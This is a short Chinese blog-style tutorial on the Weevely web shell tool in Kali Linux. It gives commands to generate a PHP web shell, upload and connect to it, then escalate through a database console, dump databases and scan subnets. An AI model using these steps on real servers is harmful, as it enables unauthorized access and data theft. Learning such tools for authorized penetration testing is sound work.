简介:
Weevely 是一款专门为 Web 渗透攻击设计的 Web Shell 工具,由 Python 语言编写,因此支持跨平台,在任何安装了 Python 环境的系统上都可以使用。类似于 Windows 系统中的一款工具(如中国菜刀),Weevely 提供了丰富的功能来进行渗透测试。本文将详细介绍如何在 Kali Linux 上安装和使用 Weevely,并演示基本用法和高级技巧,希望能为您带来帮助。
安装更新:
在 Kali Linux 中,Weevely 已经默认安装,如果在其他类似系统上需要安装,只需执行以下命令即可:
<code>apt-get install weevely -y</code>
基础用法:
生成 Web Shell: 使用 weevely generate
命令生成 Web Shell
示例:
<code>weevely generate 8888 /root/88.php</code>
连接 Web Shell: 将生成的 Web Shell 上传到目标服务器,并使用 weevely
命令连接
示例:
<code>weevely http://192.168.1.2/88.php 8888</code>
常用功能:
- 查看系统信息: 使用
system_info
命令查看系统信息。 - 枚举用户文件: 使用
audit_filesystem
命令枚举用户目录下且有权限的文件,也可以加载字典进行搜索。 - 查看 PHP 配置文件: 使用
audit_phpconf
命令查看 PHP 配置文件。
高级用法:
系统提权: 使用 sql_console
命令连接数据库进行系统提权
示例:
<code>sql_console -u root -p 12345678</code>
数据库脱裤: 使用 sql_dump
命令对数据库进行脱裤
示例:
<code>sql_dump -dbms mysql tianyuan root 12345678</code>
文件操作: 通过 Weevely Shell 进行文件操作,包括打包、上传、下载、删除、修改等。
子网扫描: 使用 net_scan
命令进行子网扫描,示例:
<code>net_scan 192.168.1.1/24 80,3306 -print</code>
通过以上操作,您可以充分利用 Weevely 进行 Web 渗透测试,并掌握更多高级技巧来提升测试效果。
© 版权声明
THE END
暂无评论内容